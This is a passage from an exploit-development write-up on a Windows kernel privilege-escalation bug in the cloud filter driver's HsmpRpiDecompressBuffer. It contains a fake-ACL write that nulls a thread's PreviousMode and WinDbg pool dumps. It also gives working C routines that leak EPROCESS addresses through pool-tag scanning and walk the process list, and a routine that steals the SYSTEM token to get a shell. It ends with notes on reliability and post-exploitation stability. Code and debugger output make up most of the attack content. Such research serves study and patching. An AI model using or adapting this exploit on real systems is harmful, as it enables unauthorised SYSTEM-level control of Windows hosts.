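    memset(acl.bytes, 0, sizeof(acl.bytes)); /* Sbz1, AceCount, Sbz2 = 0 */
    acl.bytes[0] = 0x02;                     /* AclRevision */
    acl.bytes[2] = 0x08;                     /* AclSize, low byte */
    assert(acl_revision_ok(acl.bytes[0]));
    return acl;
}
```

Only bytes 0 and 2 are non-zero, so a write using this buffer places 0x02 at the destination, a zero right after it, and 0x08 one byte further on.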

This is not a great primitive, but it should still allow us to null out the PreviousMode field of our exploit thread, thanks to the naturally occurring memory layout in that region.

More specifically, we can point both DynamicPart and PrimaryGroup to _KTHREAD+0x229.

5: kd> dq  0xffffb186051c8378-0x2f8+0x229
ffffb186`051c82a9  00000000`000000ff 40010000`00090100
ffffb186`051c82b9  ff000000`00000000 00000000`000000ff
ffffb186`051c82c9  05000000`0f010000 00000000`00000000
ffffb186`051c82d9  00000000`00000000 00000000`00000000
ffffb186`051c82e9  00000000`00000000 00000000`00000000
ffffb186`051c82f9  00000000`00000000 12000000`00100000
ffffb186`051c8309  80000000`00065800 00ffffb1`86051c80
ffffb186`051c8319  00000000`00000000 70000000`00000000

PrimaryGroup+1 will then point to a null byte, so the fake ACL is copied to _KTHREAD+0x231 (address ffffb186`051c82b1 in the dump above), allowing the 0x0 from Sbz1 to overwrite PreviousMode.

This has a side effect of setting the BasePriority of the thread to 0x8(THREAD_PRIORITY_BELOW_NORMAL), which isn’t too bad.
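The effect of the write can be simulated on a byte array standing in for the thread object. The offsets below are derived from the description above rather than from symbols: with both pointers at +0x229 and a zero byte at +0x22A, the destination formula from the assembly gives +0x231, which puts Sbz1 on +0x232 (taken here to be PreviousMode) and the low byte of AclSize on +0x233 (taken to be BasePriority). All names and the initial field values are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MODEL_THREAD_SIZE  0x300u
#define OFF_POINTER_TARGET 0x229u  /* DynamicPart == PrimaryGroup */
#define OFF_PREVIOUS_MODE  0x232u  /* assumed offset for this build */
#define OFF_BASE_PRIORITY  0x233u  /* assumed offset for this build */

typedef struct { uint8_t bytes[MODEL_THREAD_SIZE]; } ModelThread;

ModelThread model_after_write(void)
{
    static const uint8_t fake_acl[8] = { 0x02, 0x00, 0x08, 0x00, 0, 0, 0, 0 };
    ModelThread t;
    memset(&t, 0xFF, sizeof(t));
    t.bytes[OFF_POINTER_TARGET + 1] = 0x00; /* byte read via PrimaryGroup+1 */
    t.bytes[OFF_PREVIOUS_MODE] = 1;         /* UserMode before the write */
    t.bytes[OFF_BASE_PRIORITY] = 9;         /* placeholder priority */

    /* Destination = DynamicPart + 8 + 4 * byte at PrimaryGroup+1. */
    size_t dest = OFF_POINTER_TARGET + 8u + 4u * t.bytes[OFF_POINTER_TARGET + 1];
    assert(dest + sizeof(fake_acl) <= sizeof(t.bytes));
    memcpy(&t.bytes[dest], fake_acl, sizeof(fake_acl));
    return t;
}
```

After the simulated write, the byte at OFF_PREVIOUS_MODE is 0 and the byte at OFF_BASE_PRIORITY is 8, matching the side effect described above. The remaining six ACL bytes also land on the thread object, so the surrounding fields need to tolerate the values written there.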

Armed with arbitrary read and the ability to null out PreviousMode once we locate it, the greatest hurdle has been overcome. All that’s required is to find the address of the exploit thread’s PreviousMode member.

Hunting EPROCESS

Most escalation techniques, including this, require us to locate an EPROCESS structure in kernel memory. Once we locate an arbitrary EPROCESS, we can go through its ActiveProcessLinks member to hunt for the exploit process as well as a system process.
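The list walk itself is the usual circular doubly linked list traversal. The sketch below models it on ordinary user-mode structures. ModelProcess is a stand-in with made-up field offsets, and in a real exploit each pointer dereference would go through the arbitrary read primitive instead. The kernel's list also contains a head entry that is not embedded in any process, which this model leaves out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct ModelListEntry {
    struct ModelListEntry *Flink;
    struct ModelListEntry *Blink;
} ModelListEntry;

typedef struct {
    uint32_t       UniqueProcessId;
    ModelListEntry ActiveProcessLinks;
} ModelProcess;

/* Recover the enclosing structure from a pointer to its list entry. */
#define MODEL_CONTAINING_RECORD(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

/* Follow Flink pointers from `start` until `pid` is found or we wrap. */
ModelProcess *find_process(ModelProcess *start, uint32_t pid)
{
    assert(start != NULL);
    ModelListEntry *head = &start->ActiveProcessLinks;
    ModelListEntry *cur = head;
    do {
        ModelProcess *p =
            MODEL_CONTAINING_RECORD(cur, ModelProcess, ActiveProcessLinks);
        if (p->UniqueProcessId == pid)
            return p;
        cur = cur->Flink;
    } while (cur != head);
    return NULL;
}

/* Link an array of model processes into a ring. */
void link_ring(ModelProcess *procs, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        procs[i].ActiveProcessLinks.Flink = &procs[(i + 1) % n].ActiveProcessLinks;
        procs[i].ActiveProcessLinks.Blink = &procs[(i + n - 1) % n].ActiveProcessLinks;
    }
}

/* Hypothetical usage: start at any process and search for a PID. */
int demo_find_index(uint32_t pid)
{
    ModelProcess procs[3] = {
        { .UniqueProcessId = 1234 },
        { .UniqueProcessId = 4 },
        { .UniqueProcessId = 5678 },
    };
    link_ring(procs, 3);
    ModelProcess *hit = find_process(&procs[0], pid);
    return hit ? (int)(hit - procs) : -1;
}
```

Starting from any one process is enough, because the ring eventually visits every entry and the search stops when it returns to its starting point.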

On Windows versions before Windows 11 Build 25915, we can use the well known NtQuery* APIs to leak kernel addresses, including our own EPROCESS address.

Since this will no longer work soon and we already have a flexible arbitrary read primitive, I’m looking for other ways to leak an EPROCESS address.

There are many ways to leak EPROCESS, such as reading the PsInitialSystemProcess global variable or bruteforcing kernel address space.
I’ll show a shortcut to leaking an EPROCESS address from a known _TOKEN object.

While browsing through members of the _TOKEN object which we can already leak from the WNF relative read, we can find a SessionObject member that points to a chunk that resides in the non-paged 0xB0 LFH bucket.

12: kd> !pool 0xffff9788`30cf3bd0
Pool page ffff978830cf3bd0 region is Nonpaged pool
 ffff978830cf3000 size:   50 previous size:    0  (Free)       ....
 ffff978830cf3050 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf3100 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf31b0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf3260 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf3310 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf33c0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3470 size:   b0 previous size:    0  (Allocated)  WPLg
 ffff978830cf3520 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf35d0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf3680 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf3730 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf37e0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3890 size:   b0 previous size:    0  (Allocated)  ITrk
 ffff978830cf3940 size:   b0 previous size:    0  (Allocated)  ExTm
 ffff978830cf39f0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3aa0 size:   b0 previous size:    0  (Allocated)  inte
*ffff978830cf3b50 size:   b0 previous size:    0  (Allocated) *Sess
		Owning component : Unknown (update pooltag.txt)
 ffff978830cf3c00 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf3cb0 size:   b0 previous size:    0  (Allocated)  MmMl
 ffff978830cf3d60 size:   b0 previous size:    0  (Allocated)  PFXM
 ffff978830cf3e10 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf3ec0 size:   b0 previous size:    0  (Allocated)  inte

If we browse the pool allocations around it, we can find many AlIn tagged allocations.

12: kd> !pool 0xffff9788`30cf4000
Pool page ffff978830cf4000 region is Nonpaged pool
 ffff978830cf4020 size:   b0 previous size:    0  (Allocated)  Sess
 ffff978830cf40d0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf4180 size:   b0 previous size:    0  (Allocated)  WPLg
 ffff978830cf4230 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf42e0 size:   b0 previous size:    0  (Allocated)  Filt
 ffff978830cf4390 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf4440 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf44f0 size:   b0 previous size:    0  (Allocated)  Usfl
 ffff978830cf45a0 size:   b0 previous size:    0  (Allocated)  inte
 ffff978830cf4650 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4700 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf47b0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4860 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4910 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf49c0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4a70 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4b20 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4bd0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4c80 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4d30 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4de0 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4e90 size:   b0 previous size:    0  (Allocated)  AlIn
 ffff978830cf4f40 size:   b0 previous size:    0  (Allocated)  AlIn

These allocations always seem to be located close to SessionObject, and they are abundant.

I do not know what data type this allocation is, so I used WinDbg to dump pointers within it.

12: kd> .foreach (addr {dps ffff978830cf4c80 La0}) {!object addr}

ffff8f8ed1576618: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
4: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978830cf4cf8: Not a valid object (ObjectType invalid)
Object: ffff978832c67380  Type: (ffff978830805e60) IoCompletion
    ObjectHeader: ffff978832c67350 (new version)
    HandleCount: 1  PointerCount: 32748
264ffe62090: not a valid object (ObjectHeader invalid @ -offset 30)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffff978832728420: Not a valid object (ObjectType invalid)
ffff978830cf4c90: Not a valid object (ObjectType invalid)
ffff978830cf4cc8: Not a valid object (ObjectType invalid)

The allocation holds a pointer to an IoCompletion object at offset 0x38; again, I know nothing more about this object. Viewing the pool layout around it shows that it is consistently surrounded by many EtwR objects.

7: kd> !pool ffffd685bcbeb7c0 
Pool page ffffd685bcbeb7c0 region is Nonpaged pool
 ffffd685bcbeb000 size:   50 previous size:    0  (Free)       ....
 ffffd685bcbeb050 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb130 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb210 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb2f0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb3d0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb4b0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb590 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb670 size:   e0 previous size:    0  (Allocated)  EtwR
*ffffd685bcbeb750 size:   e0 previous size:    0  (Allocated) *IoCo
		Pooltag IoCo : Io completion, Binary : nt!io
 ffffd685bcbeb830 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb910 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbeb9f0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebad0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebbb0 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebc90 size:   e0 previous size:    0  (Allocated)  EtwR
 ffffd685bcbebd70 size:   e0 previous size:    0  (Allocated)  IoCo
 ffffd685bcbebe50 size:   e0 previous size:    0  (Allocated)  EtwR

This is a good sign: if the EtwR objects leak interesting pointers, the technique will be reliable without any additional spraying.

I continued by dumping pointers from the EtwR objects.

7: kd> .foreach (addr {dps ffffd685`bcbeb140 La0}) {!object addr}
ffffd685bcbeb140: Not a valid object (ObjectType invalid)

ffffd685bcbeb148: Not a valid object (ObjectType invalid)
48: not a valid object (ObjectHeader invalid @ -offset 30)
ffffd685bcbeb150: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
fffff8012726ad00: Not a valid object (ObjectType invalid)
ffffd685bcbeb158: Not a valid object (ObjectType invalid)
0: not a valid object (ObjectHeader invalid @ -offset 30)
ffffd685bcbeb160: Not a valid object (ObjectType invalid)
Object: ffffd685bcd59140  Type: (ffffd685b7ebd380) Process
    ObjectHeader: ffffd685bcd59110 (new version)
    HandleCount: 6  PointerCount: 196453
ffffd685bcbeb168: Not a valid object (ObjectType invalid)
1: not a valid object (ObjectHeader invalid @ -offset 30)

7: kd> dq ffffd685bcbeb140
ffffd685`bcbeb140  000000d8`00000000 00000000`00000048
ffffd685`bcbeb150  fffff801`2726ad00 00000000`00000000
ffffd685`bcbeb160  ffffd685`bcd59140 00000000`00000001 <- EPROCESS
ffffd685`bcbeb170  00000000`00008000 00000000`00000001

It turns out that every EtwR object holds an EPROCESS pointer at offset 0x20 (0x30 from the start of the chunk, counting the pool header), which gives us the required info leak.
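The offset arithmetic can be checked against the dq output above. The following is a minimal sketch rather than code from the exploit: the macro and function names are illustrative, and the 0x10-byte pool header size is the usual x64 value, assumed here.

```c
#include <assert.h>
#include <stdint.h>

/* Assumption: the x64 pool header is 0x10 bytes. Names are illustrative only. */
#define POOL_HEADER_SIZE      0x10u
#define ETWR_EPROCESS_OFFSET  0x20u  /* offset inside the EtwR body, per the dump */

/* Address of the slot holding the EPROCESS pointer, given the chunk start. */
static uint64_t etwr_eprocess_slot(uint64_t chunk_base)
{
    /* pool chunks are 0x10-aligned on x64 */
    assert((chunk_base & 0xF) == 0);
    return chunk_base + POOL_HEADER_SIZE + ETWR_EPROCESS_OFFSET;
}
```

For the EtwR chunk at ffffd685bcbeb130 in the pool listing, this yields ffffd685bcbeb160, the address annotated as EPROCESS in the dump.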

To summarize:

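  • Search pool memory forward and backward from the SessionObject pointer until we find the byte pattern AlIn (the pool tag)
  • Move backward by 4 bytes, since the tag sits at offset 4 of the pool header, to locate the start of the AlIn allocation
  • Offset 0x38 from this address holds an IoCompletion object pointer
  • Starting from the IoCompletion object, search pool memory for the byte pattern EtwR and move back 4 bytes in the same way to locate the EtwR allocation
  • Offset 0x30 from this address holds an EPROCESS pointer
  • Walk ActiveProcessLinks from that EPROCESS until we find our own process and the System process (PID 4)
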
BOOL LocateEPROCESSAddresses(int WnfIndex, HANDLE RwToken, ULONG_PTR TokenSessionObject, ULONG_PTR *OwnEproc, ULONG_PTR *SystemEproc)
{
    BOOL        status = FALSE;
    PBYTE       twoPageBuffer = NULL;
    DWORD       bufferSize = PAGE_SIZE * 2;
    BYTE        pageBuffer[PAGE_SIZE] = { 0 };
    DWORD       *cur = NULL;
    ULONG_PTR   allocationBase = 0;
    ULONG_PTR   addrBuffer = 0;
    ULONG64     dataBuffer = 0;
    PEPROCESS   eproc = NULL;

    twoPageBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);
    if (!twoPageBuffer) {
        printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
        goto out;
    }

    status = ArbitraryRead(WnfIndex, RwToken, TokenSessionObject, twoPageBuffer, bufferSize);
    if (!status)
        goto out;

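    cur = (DWORD *)twoPageBuffer;
    // start at 1 so that cur[i-1], the first half of the pool header, stays in bounds
    for (DWORD i = 1; i < bufferSize / sizeof(DWORD); i++) {
        if (cur[i] != 'nIlA')
            continue;

        // found tag, move back 0x4 bytes to the start of the pool header
        allocationBase = TokenSessionObject + ((ULONG64)&(cur[i-1]) - (ULONG64)twoPageBuffer);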
        printf("[+] Found AlIn allocation at 0x%llx\n", allocationBase);

        status = ArbitraryRead(WnfIndex, RwToken, allocationBase + 0x38, &addrBuffer, 0x8);
        if (!status || !addrBuffer)
            goto out;

        // found IoCompletion
        printf("[+] Found IoCompletion object at 0x%llx\n", addrBuffer);
        allocationBase = addrBuffer;

        status = ArbitraryRead(WnfIndex, RwToken, allocationBase, pageBuffer, PAGE_SIZE);
        if (!status)
            goto out;

        // find EtwR tag; use a separate cursor and index so the outer scan
        // over twoPageBuffer is not clobbered
        DWORD *etwCur = (DWORD *)pageBuffer;
        for (DWORD j = 1; j < PAGE_SIZE / sizeof(DWORD); j++) {
            if (etwCur[j] != 'RwtE')
                continue;

            // found tag, move back 0x4 bytes; allocationBase stays fixed so
            // later matches are not skewed by earlier ones
            ULONG_PTR etwBase = allocationBase + ((ULONG64)&(etwCur[j-1]) - (ULONG64)pageBuffer);

            // extract EPROCESS
            status = ArbitraryRead(WnfIndex, RwToken, etwBase + 0x30, &addrBuffer, 0x8);
            if (!status || !addrBuffer)
                goto out;

            if (addrBuffer < 0xffff000000000000) {
                puts("[-] Can't find EPROCESS");
                goto out;
            }

            // found EPROCESS
            printf("[+] Found EPROCESS object at 0x%llx\n", addrBuffer);
            eproc = (PEPROCESS)addrBuffer;

            do {
                status = ArbitraryRead(WnfIndex, RwToken, (ULONG_PTR)&eproc->UniqueProcessId, &dataBuffer, 0x8);
                if (!status)
                    goto out;

                if (dataBuffer == GetCurrentProcessId()) {
                    *OwnEproc = (ULONG_PTR)eproc;
                    printf("[+] Found own EPROCESS address: 0x%llx\n", (ULONG64)eproc);
                }

                else if (dataBuffer == 0x4) {
                    // PID 4 is the System process
                    *SystemEproc = (ULONG_PTR)eproc;
                    printf("[+] Found system EPROCESS address: 0x%llx\n", (ULONG64)eproc);
                }

                if (*OwnEproc && *SystemEproc) {
                    status = TRUE;
                    goto out;
                }

                // read Flink to move to the next process in the list
                status = ArbitraryRead(WnfIndex, RwToken, (ULONG_PTR)&eproc->ActiveProcessLinks, &dataBuffer, 0x8);
                if (!status)
                    goto out;

                eproc = CONTAINING_RECORD(dataBuffer, EPROCESS, ActiveProcessLinks);
            } while ((ULONG_PTR)eproc != addrBuffer);
        }
    }

out:
    if (twoPageBuffer)
        HeapFree(GetProcessHeap(), 0, twoPageBuffer);

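    // a successful final read does not mean the search succeeded:
    // report success only if both EPROCESS addresses were resolved
    return status && *OwnEproc && *SystemEproc;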
}
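
The tag scan at the heart of the function above can be exercised offline on a synthetic buffer. The following is a minimal sketch, not the exploit's code: find_chunk_by_tag is a hypothetical helper, and it compares raw bytes instead of relying on multi-character constants such as 'nIlA', whose value is implementation-defined in C.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: returns the byte offset of the pool header whose tag
 * field matches `tag`, or -1 if no match is found. The tag is assumed to sit
 * at offset 4 of the header, as in the write-up. */
static long find_chunk_by_tag(const uint8_t *buf, size_t len, const char tag[4])
{
    assert(buf != NULL && tag != NULL);

    /* Start at 4 so that the four header bytes before the tag are in bounds. */
    for (size_t off = 4; off + 4 <= len; off += 4) {
        if (memcmp(buf + off, tag, 4) == 0)
            return (long)(off - 4);  /* step back to the start of the header */
    }
    return -1;
}
```

Starting the scan at offset 4 mirrors the requirement that the tag be preceded by the first four bytes of the pool header. A match on the tag bytes alone can be a false positive, so a real scan would still sanity-check whatever it reads from the candidate allocation.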

Get Shell

From here the remaining steps are routine: overwrite PreviousMode, steal the SYSTEM token, restore PreviousMode, and spawn a shell.

BOOL StealToken(PEPROCESS OwnEproc, PEPROCESS SystemEproc)
{
    ULONG64 token = 0;

    // read the SYSTEM process token value
    if (!NtArbitraryRead(&SystemEproc->Token, &token, 0x8))
        return FALSE;

    // overwrite our own process token with it
    if (!NtArbitraryWrite(&OwnEproc->Token, &token, 0x8))
        return FALSE;

    return TRUE;
}

Exploit Success Rate

Empirically, the exploit succeeds in about 1 of every 15 attempts. A large proportion of the failed attempts did overwrite WNF objects, but they also overwrote the adjacent TOKEN objects, rendering the WNF object unusable. One way to improve the success rate on this version of Windows would be to overwrite the WNF sizes with a larger value, such as 0x3000, so that we can query for more, potentially untouched, TOKEN objects. However, I believe WNF only allows a maximum write of 0x1000 on later Windows versions.
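
To put the 1-in-15 figure in perspective, the chance of at least one success over several attempts can be estimated. This is a rough sketch that assumes attempts are independent and equally likely to succeed, which is a simplification, since a failed attempt may leave the system in a different state. The function name is illustrative.

```c
#include <assert.h>

/* Probability of at least one success in `attempts` independent tries,
 * each succeeding with probability `p` (assumed constant). */
static double p_at_least_one(double p, unsigned attempts)
{
    assert(p >= 0.0 && p <= 1.0);

    double all_fail = 1.0;
    for (unsigned i = 0; i < attempts; i++)
        all_fail *= 1.0 - p;  /* every attempt so far has failed */
    return 1.0 - all_fail;
}
```

Under these assumptions, p_at_least_one(1.0 / 15.0, 15) is roughly 0.64, so even fifteen attempts leave a sizeable chance of no success at all.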

Post Exploitation

The system crashes once the exploit process exits, so we have to keep the process running.

This is because the system follows the linked list of _TERMINATION_PORT objects to free each of them, and we corrupted that list along the way. One fix would be to terminate the list at the first object, located by reading _ETHREAD->TerminationPort, but then our spray objects are never freed, resulting in a memory leak. Moreover, we have also corrupted VS subsegment headers, WNF objects, and TOKEN objects along the way, any of which may cause a crash at some point.
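
The list-termination idea can be illustrated in user mode with a mock structure. This is only a sketch: mock_termination_port stands in for the kernel's _TERMINATION_PORT, the helper names are hypothetical, and in the exploit the equivalent step would be an arbitrary write of a null pointer into the first entry's Next field.

```c
#include <assert.h>
#include <stddef.h>

/* Mock of the kernel structure; only the link field matters for this sketch. */
typedef struct mock_termination_port {
    struct mock_termination_port *Next;
    void *Port;
} mock_termination_port;

/* Cut the list after its first entry so a cleanup walker never follows a
 * corrupted Next pointer. Returns the detached remainder, which is never
 * freed (the memory leak mentioned in the text). */
static mock_termination_port *truncate_after_head(mock_termination_port *head)
{
    assert(head != NULL);
    mock_termination_port *rest = head->Next;
    head->Next = NULL;
    return rest;
}

/* Count the entries a cleanup walker would visit. */
static size_t walk_length(const mock_termination_port *head)
{
    size_t n = 0;
    for (; head != NULL; head = head->Next)
        n++;
    return n;
}
```

After truncation the walker visits a single entry, so any corrupted entries further down the list are never dereferenced.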

Empirically, as long as we keep the process running, the system stays stable long enough to perform basic persistence activities.

Variants

CVE-2023-36036, patched in November 2023, stems from the same function, HsmpRpiDecompressBuffer, and is reported to be actively exploited in the wild. Unlike the CVE-2021-31969 patch, which restricts the minimum value cstmDataSize can take, this patch caps cstmDataSize at 0x4000, the maximum number of bytes HsmpRpReadBuffer will read. This suggests a possible out-of-bounds operation caused by the previously uncapped size.

Acknowledgements

I would like to thank my mentor @linhlhq for patiently guiding and assisting me through the exploit development process. This work would not have been possible without his wisdom and experience.

References